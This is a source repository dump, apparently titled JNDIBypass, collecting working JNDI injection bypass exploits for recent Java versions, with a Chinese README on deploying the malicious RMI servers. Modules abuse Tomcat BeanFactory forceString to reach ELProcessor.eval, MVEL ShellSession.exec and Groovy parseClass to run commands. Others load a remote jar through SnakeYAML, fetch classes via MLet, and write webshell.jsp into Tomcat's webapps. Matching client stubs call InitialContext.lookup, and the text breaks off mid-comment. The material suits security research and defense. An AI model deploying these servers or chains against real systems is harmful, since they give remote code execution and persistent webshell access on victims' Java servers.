├── org.yaml.snakeyaml.Yaml ├── src │ └── main │ │ ├── resources │ │ └── META-INF │ │ │ └── services │ │ │ └── javax.script.ScriptEngineFactory │ │ └── java │ │ └── org │ │ └── example │ │ ├── JNDITest.java │ │ ├── YamlServer.java │ │ └── File.java └── pom.xml ├── images ├── image-20240320225859934.png ├── image-20240320230209513.png ├── image-20240320230358272.png ├── image-20240320230449772.png └── image-20240320230541986.png ├── com.sun.glass.utils.NativeLibLoader ├── src │ └── main │ │ ├── resources │ │ └── META-INF │ │ │ └── MANIFEST.MF │ │ └── java │ │ └── org │ │ └── example │ │ ├── JNDITest.java │ │ └── NativeLibLoaderServer.java ├── target │ └── classes │ │ └── org │ │ └── example │ │ ├── JNDITest.class │ │ └── NativeLibLoaderServer.class └── pom.xml ├── .idea ├── .gitignore ├── vcs.xml ├── modules.xml ├── JNDIBypass.iml ├── jarRepositories.xml ├── compiler.xml ├── misc.xml ├── encodings.xml ├── artifacts │ ├── org_yaml_snakeyaml_Yaml_jar.xml │ └── org_apache_naming_factory_BeanFactory_jar.xml └── uiDesigner.xml ├── javax.management.loading.MLet ├── target │ └── classes │ │ └── org │ │ └── example │ │ ├── JNDITest.class │ │ └── MletServer.class ├── src │ └── main │ │ └── java │ │ └── org │ │ └── example │ │ ├── JNDITest.java │ │ └── MletServer.java └── pom.xml ├── ByUnserialize ├── src │ └── main │ │ └── java │ │ └── org │ │ └── example │ │ ├── JNDITest.java │ │ └── UnserializeLDAPServer.java └── pom.xml ├── org.apache.naming.factory.BeanFactory ├── src │ └── main │ │ └── java │ │ └── org │ │ └── example │ │ ├── JNDITest.java │ │ └── TomcatBeanFactoryServer.java └── pom.xml ├── org.mvel2.sh.ShellSession.exec ├── src │ └── main │ │ └── java │ │ └── org │ │ └── example │ │ ├── JNDITest.java │ │ └── MvelServer.java └── pom.xml ├── com.thoughtworks.xstream.XStream.fromXML ├── src │ └── main │ │ └── java │ │ └── org │ │ └── example │ │ ├── JNDITest.java │ │ └── XstreamServer.java └── pom.xml ├── groovy.lang.GroovyClassLoader.parseClass ├── src │ └── main │ │ 
└── java │ │ └── org │ │ └── example │ │ ├── JNDITest.java │ │ └── GroovyShellServer.java └── pom.xml ├── org.apache.catalina.users.MemoryUserDatabaseFactory ├── src │ └── main │ │ └── java │ │ └── org │ │ └── example │ │ ├── JNDITest_XXEServer.java │ │ ├── XXEServer.java │ │ ├── UserDataRCE_Server_windows.java │ │ └── UserDataRCE_Server_linux.java └── pom.xml └── README.md /org.yaml.snakeyaml.Yaml/src/main/resources/META-INF/services/javax.script.ScriptEngineFactory: -------------------------------------------------------------------------------- 1 | org.example.File -------------------------------------------------------------------------------- /images/image-20240320225859934.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LtmThink/JNDIBypass/HEAD/images/image-20240320225859934.png -------------------------------------------------------------------------------- /images/image-20240320230209513.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LtmThink/JNDIBypass/HEAD/images/image-20240320230209513.png -------------------------------------------------------------------------------- /images/image-20240320230358272.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LtmThink/JNDIBypass/HEAD/images/image-20240320230358272.png -------------------------------------------------------------------------------- /images/image-20240320230449772.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LtmThink/JNDIBypass/HEAD/images/image-20240320230449772.png -------------------------------------------------------------------------------- /images/image-20240320230541986.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/LtmThink/JNDIBypass/HEAD/images/image-20240320230541986.png -------------------------------------------------------------------------------- /com.sun.glass.utils.NativeLibLoader/src/main/resources/META-INF/MANIFEST.MF: -------------------------------------------------------------------------------- 1 | Manifest-Version: 1.0 2 | Main-Class: org.example.TomcatBeanFactoryServer 3 | 4 | -------------------------------------------------------------------------------- /.idea/.gitignore: -------------------------------------------------------------------------------- 1 | # 默认忽略的文件 2 | /shelf/ 3 | /workspace.xml 4 | # 基于编辑器的 HTTP 客户端请求 5 | /httpRequests/ 6 | # Datasource local storage ignored files 7 | /dataSources/ 8 | /dataSources.local.xml 9 | -------------------------------------------------------------------------------- /javax.management.loading.MLet/target/classes/org/example/JNDITest.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LtmThink/JNDIBypass/HEAD/javax.management.loading.MLet/target/classes/org/example/JNDITest.class -------------------------------------------------------------------------------- /.idea/vcs.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /javax.management.loading.MLet/target/classes/org/example/MletServer.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LtmThink/JNDIBypass/HEAD/javax.management.loading.MLet/target/classes/org/example/MletServer.class -------------------------------------------------------------------------------- /com.sun.glass.utils.NativeLibLoader/target/classes/org/example/JNDITest.class: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/LtmThink/JNDIBypass/HEAD/com.sun.glass.utils.NativeLibLoader/target/classes/org/example/JNDITest.class -------------------------------------------------------------------------------- /com.sun.glass.utils.NativeLibLoader/target/classes/org/example/NativeLibLoaderServer.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LtmThink/JNDIBypass/HEAD/com.sun.glass.utils.NativeLibLoader/target/classes/org/example/NativeLibLoaderServer.class -------------------------------------------------------------------------------- /.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /.idea/JNDIBypass.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /ByUnserialize/src/main/java/org/example/JNDITest.java: -------------------------------------------------------------------------------- 1 | package org.example; 2 | 3 | 4 | import javax.naming.InitialContext; 5 | import javax.naming.NamingException; 6 | 7 | /* Vulnerable-client stub for the ByUnserialize module: it hands a hard-coded ldap:// URL (port 4444, unlike the rmi:// port 1100 used by every other JNDITest on this page) to InitialContext.lookup, the call that lets whatever answers on that address steer what the JVM resolves; the result is stored in a local that is never used. The matching server, UnserializeLDAPServer, is cut off at the end of this page; its pom pins commons-collections 3.2.1. Defender's view: never pass externally influenced names to lookup(), and treat outbound LDAP/RMI from a JVM that has no reason to make it as the detection signal. */ public class JNDITest { 8 | public static void main(String[] args) throws Exception { 9 | Object object=new InitialContext().lookup("ldap://127.0.0.1:4444/dc=example,dc=com"); 10 | } 11 | 12 | } 13 | 14 | -------------------------------------------------------------------------------- /org.yaml.snakeyaml.Yaml/src/main/java/org/example/JNDITest.java: -------------------------------------------------------------------------------- 1 | package org.example; 2 | 3 | 4 | import javax.naming.InitialContext; 5 | import javax.naming.NamingException; 6 | 7 | public class JNDITest { 8 | public static void main(String[] args) throws NamingException { 9 | String uri = 
"rmi://127.0.0.1:1100/yaml"; 10 | InitialContext initialContext = new InitialContext(); 11 | initialContext.lookup(uri); 12 | } 13 | 14 | } 15 | 16 | -------------------------------------------------------------------------------- /javax.management.loading.MLet/src/main/java/org/example/JNDITest.java: -------------------------------------------------------------------------------- 1 | package org.example; 2 | 3 | 4 | import javax.naming.InitialContext; 5 | import javax.naming.NamingException; 6 | 7 | /* Client stub for the MLet module. The bound name "melt" is a misspelling of "mlet", but MletServer binds the same misspelled name, so the pair is consistent. */ public class JNDITest { 8 | public static void main(String[] args) throws NamingException { 9 | String uri = "rmi://127.0.0.1:1100/melt"; 10 | InitialContext initialContext = new InitialContext(); 11 | initialContext.lookup(uri); 12 | } 13 | 14 | } 15 | 16 | -------------------------------------------------------------------------------- /org.apache.naming.factory.BeanFactory/src/main/java/org/example/JNDITest.java: -------------------------------------------------------------------------------- 1 | package org.example; 2 | 3 | 4 | import javax.naming.InitialContext; 5 | import javax.naming.NamingException; 6 | 7 | /* Client stub for the BeanFactory module; looks up "Exploit", the name TomcatBeanFactoryServer binds. */ public class JNDITest { 8 | public static void main(String[] args) throws NamingException { 9 | String uri = "rmi://127.0.0.1:1100/Exploit"; 10 | InitialContext initialContext = new InitialContext(); 11 | initialContext.lookup(uri); 12 | } 13 | 14 | } -------------------------------------------------------------------------------- /org.mvel2.sh.ShellSession.exec/src/main/java/org/example/JNDITest.java: -------------------------------------------------------------------------------- 1 | package org.example; 2 | 3 | 4 | import javax.naming.InitialContext; 5 | import javax.naming.NamingException; 6 | 7 | /* Client stub for the MVEL module; looks up "mvel", the name MvelServer binds. Every JNDITest copy on this page has the same shape; the only thing that differs is the hard-coded URI, so a single client taking the URI as an argument would replace all of them. */ public class JNDITest { 8 | public static void main(String[] args) throws NamingException { 9 | String uri = "rmi://127.0.0.1:1100/mvel"; 10 | InitialContext initialContext = new InitialContext(); 11 | initialContext.lookup(uri); 12 | } 13 | 14 | } 15 | 16 | 
-------------------------------------------------------------------------------- /com.sun.glass.utils.NativeLibLoader/src/main/java/org/example/JNDITest.java: -------------------------------------------------------------------------------- 1 | package org.example; 2 | 3 | 4 | import javax.naming.InitialContext; 5 | import javax.naming.NamingException; 6 | 7 | /* Client stub for the NativeLibLoader module; looks up "dllLoader", the name NativeLibLoaderServer binds. */ public class JNDITest { 8 | public static void main(String[] args) throws NamingException { 9 | String uri = "rmi://127.0.0.1:1100/dllLoader"; 10 | InitialContext initialContext = new InitialContext(); 11 | initialContext.lookup(uri); 12 | } 13 | 14 | } 15 | 16 | -------------------------------------------------------------------------------- /com.thoughtworks.xstream.XStream.fromXML/src/main/java/org/example/JNDITest.java: -------------------------------------------------------------------------------- 1 | package org.example; 2 | 3 | 4 | import javax.naming.InitialContext; 5 | import javax.naming.NamingException; 6 | 7 | /* Client stub for the XStream module; looks up "FromXML", the name XstreamServer binds. */ public class JNDITest { 8 | public static void main(String[] args) throws NamingException { 9 | String uri = "rmi://127.0.0.1:1100/FromXML"; 10 | InitialContext initialContext = new InitialContext(); 11 | initialContext.lookup(uri); 12 | } 13 | 14 | } 15 | 16 | -------------------------------------------------------------------------------- /groovy.lang.GroovyClassLoader.parseClass/src/main/java/org/example/JNDITest.java: -------------------------------------------------------------------------------- 1 | package org.example; 2 | 3 | 4 | import javax.naming.InitialContext; 5 | import javax.naming.NamingException; 6 | 7 | /* Client stub for the Groovy module; looks up "evilGroovy", the name GroovyShellServer binds. */ public class JNDITest { 8 | public static void main(String[] args) throws NamingException { 9 | String uri = "rmi://127.0.0.1:1100/evilGroovy"; 10 | InitialContext initialContext = new InitialContext(); 11 | initialContext.lookup(uri); 12 | } 13 | 14 | } 15 | 16 | -------------------------------------------------------------------------------- 
/org.apache.catalina.users.MemoryUserDatabaseFactory/src/main/java/org/example/JNDITest_XXEServer.java: -------------------------------------------------------------------------------- 1 | package org.example; 2 | 3 | 4 | import javax.naming.InitialContext; 5 | import javax.naming.NamingException; 6 | 7 | /* Client stub for the MemoryUserDatabaseFactory module; looks up "xxe", the name XXEServer binds. NOTE(review): this module also binds "writeFile" (UserDataRCE_Server_windows / UserDataRCE_Server_linux), and no JNDITest on this page looks that name up, so that path has no client here. */ public class JNDITest_XXEServer { 8 | public static void main(String[] args) throws NamingException { 9 | String uri = "rmi://127.0.0.1:1100/xxe"; 10 | InitialContext initialContext = new InitialContext(); 11 | initialContext.lookup(uri); 12 | } 13 | 14 | } 15 | 16 | -------------------------------------------------------------------------------- /com.sun.glass.utils.NativeLibLoader/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 4.0.0 6 | 7 | org.example 8 | com.sun.glass.utils.NativeLibLoader 9 | 1.0-SNAPSHOT 10 | 11 | 12 | org.apache.tomcat 13 | tomcat-catalina 14 | 9.0.8 15 | 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /.idea/jarRepositories.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 9 | 10 | 14 | 15 | 19 | 20 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # JNDIBypass 2 | 高版本java各种JNDI Bypass方法复现+相应RMI服务端代码 3 | 4 | 关于本仓库所有的绕过方法复现使用可以看我的这篇[博客](https://ltmthink.github.io/2024/03/18/JNDIBypass/) 5 | 6 | 所有的复现都是基于[这篇文章](https://www.cnblogs.com/bitterz/p/15946406.html#11-%E6%80%9D%E8%B7%AF%E4%B8%80%E7%9A%84%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90),想要详细了解原理的可以去查看 7 | 8 | #### 将相关源码利于与远程服务端示例 9 | 10 | 以org.apache.naming.factory.BeanFactory这个类为例,进入相关目录找到相应服务端的代码 11 | 12 | ![image-20240320225859934](images/image-20240320225859934.png) 13 | 14 | 然后将所有的127.0.0.1修改为个人服务器的ip 15 | 16 | 构建工件获得相应jar包 17 | 18 | ![image-20240320230209513](images/image-20240320230209513.png) 19 | 
20 | 将相应jar包上传至个人服务器,并使用`java -jar xxxx.jar`运行 21 | 22 | ![image-20240320230358272](images/image-20240320230358272.png) 23 | 24 | 修改对应JNDITest.java文件内的ip地址 25 | 26 | ![image-20240320230449772](images/image-20240320230449772.png) 27 | 28 | 运行JNDITest.jar即可触发JNDI漏洞弹出计算器 29 | 30 | ![image-20240320230541986](images/image-20240320230541986.png) 31 | -------------------------------------------------------------------------------- /javax.management.loading.MLet/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 4.0.0 6 | 7 | org.example 8 | javax.management.loading.MLet 9 | 1.0-SNAPSHOT 10 | 11 | 12 | 8 13 | 8 14 | UTF-8 15 | 16 | 17 | 18 | org.apache.tomcat 19 | tomcat-catalina 20 | 9.0.8 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /org.apache.catalina.users.MemoryUserDatabaseFactory/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 4.0.0 6 | 7 | org.example 8 | org.apache.catalina.users.MemoryUserDatabaseFactory 9 | 1.0-SNAPSHOT 10 | 11 | 12 | 8 13 | 8 14 | UTF-8 15 | 16 | 17 | 18 | org.apache.tomcat 19 | tomcat-catalina 20 | 9.0.8 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /org.apache.catalina.users.MemoryUserDatabaseFactory/src/main/java/org/example/XXEServer.java: -------------------------------------------------------------------------------- 1 | package org.example; 2 | 3 | import com.sun.jndi.rmi.registry.ReferenceWrapper; 4 | import org.apache.naming.ResourceRef; 5 | 6 | import javax.naming.StringRefAddr; 7 | import java.rmi.registry.LocateRegistry; 8 | import java.rmi.registry.Registry; 9 | 10 | public class XXEServer { 11 | public static void main(String[] args) throws Exception { 12 | System.out.println("Creating evil RMI registry on port 1100"); 13 | Registry registry = LocateRegistry.createRegistry(1100); 14 | 
System.setProperty("java.rmi.server.hostname", "127.0.0.1"); 15 | 16 | /* XXEServer, continued (the class header and the createRegistry call are on the preceding page line). The Reference names Tomcat's MemoryUserDatabaseFactory and points "pathname" at a remote XML document, so the XML parsing done while Tomcat loads that user database is presumably what the module name refers to — confirm against MemoryUserDatabase. Unlike the two writeFile servers in this module, "readonly" is left unset here. Consuming-side mitigation is the same as for every Tomcat-bean reference on this page: keep Tomcat current and never resolve JNDI names that come from outside. */ ResourceRef ref = new ResourceRef("org.apache.catalina.UserDatabase", null, "", "", true,"org.apache.catalina.users.MemoryUserDatabaseFactory",null); 17 | ref.add(new StringRefAddr("pathname","http://127.0.0.1:7777/exp.xml")); 18 | 19 | ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref); 20 | registry.bind("xxe", referenceWrapper); 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /.idea/compiler.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | -------------------------------------------------------------------------------- /org.yaml.snakeyaml.Yaml/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 4.0.0 6 | 7 | org.example 8 | org.yaml.snakeyaml.Yaml 9 | 1.0-SNAPSHOT 10 | 11 | 12 | 8 13 | 8 14 | UTF-8 15 | 16 | 17 | 18 | org.apache.tomcat 19 | tomcat-catalina 20 | 9.0.8 21 | 22 | 23 | org.yaml 24 | snakeyaml 25 | 1.33 26 | 27 | 28 | 29 | -------------------------------------------------------------------------------- /org.mvel2.sh.ShellSession.exec/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 4.0.0 6 | 7 | org.example 8 | org.mvel2.sh.ShellSession.exec 9 | 1.0-SNAPSHOT 10 | 11 | 12 | 8 13 | 8 14 | UTF-8 15 | 16 | 17 | 18 | org.apache.tomcat 19 | tomcat-catalina 20 | 9.0.8 21 | 22 | 23 | org.mvel 24 | mvel2 25 | 2.4.12.Final 26 | 27 | 28 | -------------------------------------------------------------------------------- /org.apache.catalina.users.MemoryUserDatabaseFactory/src/main/java/org/example/UserDataRCE_Server_windows.java: -------------------------------------------------------------------------------- 1 | package org.example; 2 | 3 | import 
com.sun.jndi.rmi.registry.ReferenceWrapper; 4 | import org.apache.naming.ResourceRef; 5 | 6 | import javax.naming.StringRefAddr; 7 | import java.rmi.registry.LocateRegistry; 8 | import java.rmi.registry.Registry; 9 | 10 | /* Windows variant of the writeFile server. Its body is identical to UserDataRCE_Server_linux further down this page except for the class name (and the commented-out experiments kept there), so one class would do for both. The "pathname" value combines an http URL with ../ segments; "readonly"="false" is presumably what lets MemoryUserDatabase save the database back instead of only reading it — verify against MemoryUserDatabase. ReferenceWrapper is imported yet still constructed through its fully qualified name. */ public class UserDataRCE_Server_windows { 11 | public static void main(String[] args) throws Exception{ 12 | System.out.println("Creating evil RMI registry on port 1100"); 13 | Registry registry = LocateRegistry.createRegistry(1100); 14 | System.setProperty("java.rmi.server.hostname", "127.0.0.1"); 15 | 16 | ResourceRef ref = new ResourceRef("org.apache.catalina.UserDatabase", null, "", "", 17 | true, "org.apache.catalina.users.MemoryUserDatabaseFactory", null); 18 | ref.add(new StringRefAddr("pathname", "http://127.0.0.1:7777/../../webapps/ROOT/webshell.jsp")); 19 | ref.add(new StringRefAddr("readonly", "false")); 20 | 21 | ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref); 22 | registry.bind("writeFile", referenceWrapper); 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /groovy.lang.GroovyClassLoader.parseClass/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 4.0.0 6 | 7 | org.example 8 | groovy.lang.GroovyClassLoader.parseClass 9 | 1.0-SNAPSHOT 10 | 11 | 12 | 8 13 | 8 14 | UTF-8 15 | 16 | 17 | 18 | org.codehaus.groovy 19 | groovy 20 | 2.4.3 21 | 22 | 23 | org.apache.tomcat 24 | tomcat-catalina 25 | 9.0.8 26 | 27 | 28 | 29 | -------------------------------------------------------------------------------- /com.thoughtworks.xstream.XStream.fromXML/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 4.0.0 6 | 7 | org.example 8 | com.thoughtworks.xstream.XStream.fromXML 9 | 1.0-SNAPSHOT 10 | 11 | 12 | 8 13 | 8 14 | UTF-8 15 | 16 | 17 | 18 | org.apache.tomcat 19 | tomcat-catalina 20 | 9.0.8 21 | 22 | 23 | com.thoughtworks.xstream 24 | xstream 25 | 1.4.6 26 | 27 
| 28 | 29 | -------------------------------------------------------------------------------- /javax.management.loading.MLet/src/main/java/org/example/MletServer.java: -------------------------------------------------------------------------------- 1 | package org.example; 2 | 3 | import com.sun.jndi.rmi.registry.ReferenceWrapper; 4 | import org.apache.naming.ResourceRef; 5 | 6 | import javax.naming.StringRefAddr; 7 | import java.rmi.registry.LocateRegistry; 8 | import java.rmi.registry.Registry; 9 | 10 | /* RMI side of the MLet module: binds "melt" to a Reference whose factory is Tomcat's BeanFactory and whose forceString entry maps the properties a, b and c onto loadClass, addURL and loadClass of javax.management.loading.MLet, with "b" pointing at an http code base on 127.0.0.1:2333. Defender's notes: the chain rests on BeanFactory honoring forceString, which later Tomcat releases removed (the poms on this page pin 9.0.8 — confirm against the version actually deployed), and the MLet path fetches classes from a remote URL, so unexpected outbound http from the JVM is the detection signal. ReferenceWrapper is imported yet constructed by its fully qualified name. */ public class MletServer { 11 | public static void main(String[] args) throws Exception { 12 | System.out.println("Creating evil RMI registry on port 1100"); 13 | Registry registry = LocateRegistry.createRegistry(1100); 14 | System.setProperty("java.rmi.server.hostname", "127.0.0.1"); 15 | ResourceRef ref = new ResourceRef("javax.management.loading.MLet", null, "", "", true,"org.apache.naming.factory.BeanFactory",null); 16 | ref.add(new StringRefAddr("forceString", "a=loadClass,b=addURL,c=loadClass")); 17 | ref.add(new StringRefAddr("a","java.lang.Runtime")); 18 | ref.add(new StringRefAddr("b","http://127.0.0.1:2333/")); 19 | ref.add(new StringRefAddr("c","Bitterz")); 20 | 21 | ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref); 22 | registry.bind("melt", referenceWrapper); 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /org.mvel2.sh.ShellSession.exec/src/main/java/org/example/MvelServer.java: -------------------------------------------------------------------------------- 1 | package org.example; 2 | 3 | import com.sun.jndi.rmi.registry.ReferenceWrapper; 4 | import org.apache.naming.ResourceRef; 5 | 6 | import javax.naming.StringRefAddr; 7 | import java.rmi.registry.LocateRegistry; 8 | import java.rmi.registry.Registry; 9 | 10 | /* RMI side of the MVEL module: binds "mvel" to a BeanFactory Reference whose forceString entry maps "a" onto ShellSession.exec. The module's pom pins mvel2 2.4.12.Final. Consuming-side mitigation: never feed untrusted text to an MVEL shell session, and see the BeanFactory/forceString note on MletServer above. */ public class MvelServer { 11 | public static void main(String[] args) throws Exception { 12 | Registry registry = LocateRegistry.createRegistry(1100); 
13 | System.setProperty("java.rmi.server.hostname", "127.0.0.1"); 14 | // Instantiate the Reference with factory class org.apache.naming.factory.BeanFactory. NOTE(review): the original comment named javax.el.ELProcessor as the target class — it was copied from TomcatBeanFactoryServer; the class actually named below is org.mvel2.sh.ShellSession 15 | ResourceRef ref = new ResourceRef("org.mvel2.sh.ShellSession", null, "", "", true,"org.apache.naming.factory.BeanFactory",null); 16 | 17 | // Force the setter lookup for the property onto another method name (the original comment spoke of 'x' -> 'eval'; here it is a -> exec); see BeanFactory.getObjectInstance for the details 18 | ref.add(new StringRefAddr("forceString", "a=exec")); 19 | ref.add(new StringRefAddr("a", "push Runtime.getRuntime().exec('calc');")); 20 | 21 | 22 | ReferenceWrapper referenceWrapper = new ReferenceWrapper(ref); 23 | registry.bind("mvel", referenceWrapper); // bind the registry name 24 | System.out.println("Server Start on 1100..."); 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /ByUnserialize/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 4.0.0 6 | 7 | org.example 8 | ByUnserialize 9 | 1.0-SNAPSHOT 10 | 11 | 12 | 8 13 | 8 14 | UTF-8 15 | 16 | 17 | 18 | com.unboundid 19 | unboundid-ldapsdk 20 | 3.2.0 21 | 22 | 23 | 24 | commons-collections 25 | commons-collections 26 | 3.2.1 27 | 28 | 29 | 30 | 31 | -------------------------------------------------------------------------------- /org.yaml.snakeyaml.Yaml/src/main/java/org/example/YamlServer.java: -------------------------------------------------------------------------------- 1 | package org.example; 2 | 3 | import com.sun.jndi.rmi.registry.ReferenceWrapper; 4 | import org.apache.naming.ResourceRef; 5 | 6 | import javax.naming.StringRefAddr; 7 | import java.rmi.registry.LocateRegistry; 8 | import java.rmi.registry.Registry; 9 | 10 | /* RMI side of the SnakeYAML module: forceString maps "a" onto Yaml.load, and the yaml text handed to it declares a javax.script.ScriptEngineManager over a java.net.URLClassLoader whose URL is http://127.0.0.1:8888/yaml-payload.jar. That jar is presumably the build of this very module (the .idea artifact org_yaml_snakeyaml_Yaml_jar), whose META-INF/services/javax.script.ScriptEngineFactory registers org.example.File — see File.java later on this page. The pom pins snakeyaml 1.33. Consuming-side mitigation: never pass untrusted text to Yaml.load with the default constructor; use SafeConstructor or a typed loader. */ public class YamlServer { 11 | public static void main(String[] args) throws Exception { 12 | Registry registry = LocateRegistry.createRegistry(1100); 13 | System.setProperty("java.rmi.server.hostname", "127.0.0.1"); 14 | 15 | ResourceRef ref = new ResourceRef("org.yaml.snakeyaml.Yaml", null, "", "", 
true,"org.apache.naming.factory.BeanFactory",null); 16 | String yaml = "!!javax.script.ScriptEngineManager [\n" + 17 | " !!java.net.URLClassLoader [[\n" + 18 | " !!java.net.URL [\"http://127.0.0.1:8888/yaml-payload.jar\"]\n" + 19 | " ]]\n" + 20 | "]"; 21 | ref.add(new StringRefAddr("forceString", "a=load")); 22 | ref.add(new StringRefAddr("a", yaml)); 23 | 24 | ReferenceWrapper referenceWrapper = new ReferenceWrapper(ref); 25 | registry.bind("yaml", referenceWrapper); // bind the registry name 26 | System.out.println("Server Start on 1100..."); 27 | } 28 | } -------------------------------------------------------------------------------- /groovy.lang.GroovyClassLoader.parseClass/src/main/java/org/example/GroovyShellServer.java: -------------------------------------------------------------------------------- 1 | package org.example; 2 | 3 | import com.sun.jndi.rmi.registry.ReferenceWrapper; 4 | import org.apache.naming.ResourceRef; 5 | 6 | import javax.naming.StringRefAddr; 7 | import java.rmi.registry.LocateRegistry; 8 | import java.rmi.registry.Registry; 9 | 10 | /* RMI side of the Groovy module: forceString maps "x" onto GroovyClassLoader.parseClass, and the script uses an @groovy.transform.ASTTest annotation so its assert body runs while the source is being compiled, before any class from it is instantiated. The module's pom pins groovy 2.4.3. Consuming-side mitigation: never compile Groovy source that comes from outside, or compile it under a SecureASTCustomizer. ReferenceWrapper is imported yet constructed by its fully qualified name. */ public class GroovyShellServer { 11 | public static void main(String[] args) throws Exception { 12 | System.out.println("Creating evil RMI registry on port 1100"); 13 | Registry registry = LocateRegistry.createRegistry(1100); 14 | System.setProperty("java.rmi.server.hostname", "127.0.0.1"); 15 | ResourceRef ref = new ResourceRef("groovy.lang.GroovyClassLoader", null, "", "", true,"org.apache.naming.factory.BeanFactory",null); 16 | ref.add(new StringRefAddr("forceString", "x=parseClass")); 17 | String script = "@groovy.transform.ASTTest(value={\n" + 18 | " assert java.lang.Runtime.getRuntime().exec(\"calc\")\n" + 19 | "})\n" + 20 | "def x\n"; 21 | ref.add(new StringRefAddr("x",script)); 22 | 23 | ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref); 24 | registry.bind("evilGroovy", referenceWrapper); 25 | } 26 | } 27 | 
-------------------------------------------------------------------------------- /.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 19 | 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /org.apache.naming.factory.BeanFactory/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 4.0.0 6 | 7 | org.example 8 | org.apache.naming.factory.BeanFactory 9 | 1.0-SNAPSHOT 10 | 11 | 12 | 8 13 | 8 14 | UTF-8 15 | 16 | 17 | 18 | org.apache.tomcat 19 | tomcat-dbcp 20 | 9.0.8 21 | 22 | 23 | org.apache.tomcat 24 | tomcat-catalina 25 | 9.0.8 26 | 27 | 28 | org.apache.tomcat 29 | tomcat-jasper 30 | 9.0.8 31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /org.apache.naming.factory.BeanFactory/src/main/java/org/example/TomcatBeanFactoryServer.java: -------------------------------------------------------------------------------- 1 | package org.example; 2 | 3 | import com.sun.jndi.rmi.registry.ReferenceWrapper; 4 | import org.apache.naming.ResourceRef; 5 | 6 | import javax.naming.StringRefAddr; 7 | import java.rmi.registry.LocateRegistry; 8 | import java.rmi.registry.Registry; 9 | 10 | /* RMI side of the BeanFactory module (built as the .idea artifact org_apache_naming_factory_BeanFactory_jar): binds "Exploit" to a Reference that names javax.el.ELProcessor as the bean and BeanFactory as the factory, with forceString steering the "bitterz" property onto ELProcessor.eval. Defender's note: everything here depends on BeanFactory's forceString handling, which later Tomcat releases removed; the poms on this page pin 9.0.8, so check the version actually in use. Note the NativeLibLoader module's MANIFEST.MF on this page also names this class as its Main-Class although it is not part of that module. */ public class TomcatBeanFactoryServer { 11 | public static void main(String[] args) throws Exception { 12 | Registry registry = LocateRegistry.createRegistry(1100); 13 | System.setProperty("java.rmi.server.hostname", "127.0.0.1"); 14 | // Instantiate the Reference: target class javax.el.ELProcessor, factory class org.apache.naming.factory.BeanFactory 15 | ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null); 16 | 17 | // Force the setter for property 'x' from 'setX' to 'eval' (the property is actually named bitterz below); see BeanFactory.getObjectInstance for the details 18 | ref.add(new StringRefAddr("forceString", "bitterz=eval")); 19 | 20 | // The bitterz property supplies the argument its 'setter' takes, which is really the argument to ELProcessor.eval; the expression is what executes the command 21 | ref.add(new 
StringRefAddr("bitterz", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['calc']).start()\")")); 22 | 23 | ReferenceWrapper referenceWrapper = new ReferenceWrapper(ref); 24 | registry.bind("Exploit", referenceWrapper); // bind the registry name 25 | System.out.println("Server Start on 1100..."); 26 | } 27 | } -------------------------------------------------------------------------------- /com.sun.glass.utils.NativeLibLoader/src/main/java/org/example/NativeLibLoaderServer.java: -------------------------------------------------------------------------------- 1 | package org.example; 2 | 3 | import com.sun.jndi.rmi.registry.ReferenceWrapper; 4 | import org.apache.naming.ResourceRef; 5 | 6 | import javax.naming.NamingException; 7 | import javax.naming.StringRefAddr; 8 | import java.rmi.AlreadyBoundException; 9 | import java.rmi.RemoteException; 10 | import java.rmi.registry.LocateRegistry; 11 | import java.rmi.registry.Registry; 12 | /* 13 | com.sun.glass.utils.NativeLibLoader: a native-library loading helper class bundled with the JDK 